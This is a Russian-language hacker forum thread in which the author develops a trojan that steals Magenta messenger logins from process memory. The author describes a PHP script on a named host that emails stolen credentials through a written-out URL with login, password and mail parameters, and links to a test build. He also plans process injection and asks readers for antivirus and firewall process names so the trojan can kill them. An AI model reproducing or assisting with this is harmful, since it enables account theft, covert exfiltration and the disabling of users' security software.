У меня касперский не запалил ничего, и аутпост тоже.

на самом деле довольно долго память сканин и проц провешивает... Сейчас решу эту проблему и отвяжу от галки сохранять пароль (вернее от данных из реестра)!
Думаю брутить по другому алгоритму! А то народ не всегда галку ставит...

Сейчас готов скрипт работающий на левом хосте и отправляющий через урл логин и пароль на нужный ящик.. =) Так что скора будет релиз проги и скрипта обслуживающего прогу!

Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.

Согласен... Узкая, но для меня начинающего, надеюсь будет отправной точкой в мир хакерства! =)

Так на сегодняшний день уже:
1. Прога не привязана к реестру (не обязательно ставить галку сохранить пароль)
2. Поиск и парсинг происходит на-а-амного быстрее: (вычисление адреса PE заголовка в памяти + смещение к сегменту данных (размер проги)) Вычисление абсолютного адреса не получилось, имхо файл у них запакован UPX, соответственно PE не совсем тот что нужен мне.. =( Ну и хер с ним.. =) Мы тоже не лыком шиты!
Приблизительный адрес все равно вычисляем! Единственное чтобы вычислить адрес PE хидера, пришлось создавать поток в процессе жертве... Нормальные Антивири на такое могут заорать! =( Но без такого выкрутаса не получить правильного адреса PE хидера MAgenta...
3. Написал скрипт на php, лежит на
darkanclave.hut2.ru - примитив, но исправно должен отправлять пару параметров на указанную почту!
Вызывает так:
darkanclave.hut2.ru/getaccount.php?l=<param1>&p=<param2>&mail=<Ваш� � почта>
сейчас затачиваю прогу под него! Чтобы скрыто отправляла все что выдрала через этот URL...

Кому интересно новая(скоростная) тестовая версия (без отправки и с выводом лога) лежит: anclave2007.narod.ru/mh.ex

Заранее извеняюсь, если что-то не увидел, или просмотрел, но к проге есть мануал, как ею узать?
Заранее спасибо.
ПС автору спасибо за прогу

Прога еще в разработке. Жди пока он ее закончит.

там не нужен мануал просто отправляешь фаил и потом ловишь пасс
но чесно сказать неизвестно выложиться прога в паблик или нет потому как обидели человека очень сильно!

Ну... Уж не так сильно, так немножко подобосрали.. =)
Короче народ! Программа почти написана, находится в стадии тестирования и разработки механизма интеграции вредоносного кода в левые процессы... Если не сложно!
Киньте названия процессов всех антивирей и файеров что вам встречались или которые вы юзаете!
Например:
outpost.exe
и т.п.
Это нужно для троя, он будет гасить это дерьмо в памяти
перед своей интеграцией в чужой процесс имхо эти пакостные помошники жизни юзверей перехватывают API вызовы, и блокируют интеграцию.. Чтобы этого не было их нужно замочить... Механизм собственного перехвата API не удобен, имхо после этого трой начинает плохо сосуществовать с антивирями и файерволами! =( Кто юзал к примеру OutpoSt и каспера одновременно на одной тачиле знают, что может быть полная жопа! Поэтому самы простой способ, вырубаем это дерьмо из памяти, интегрируемся, пускай юзер запускает заново... =)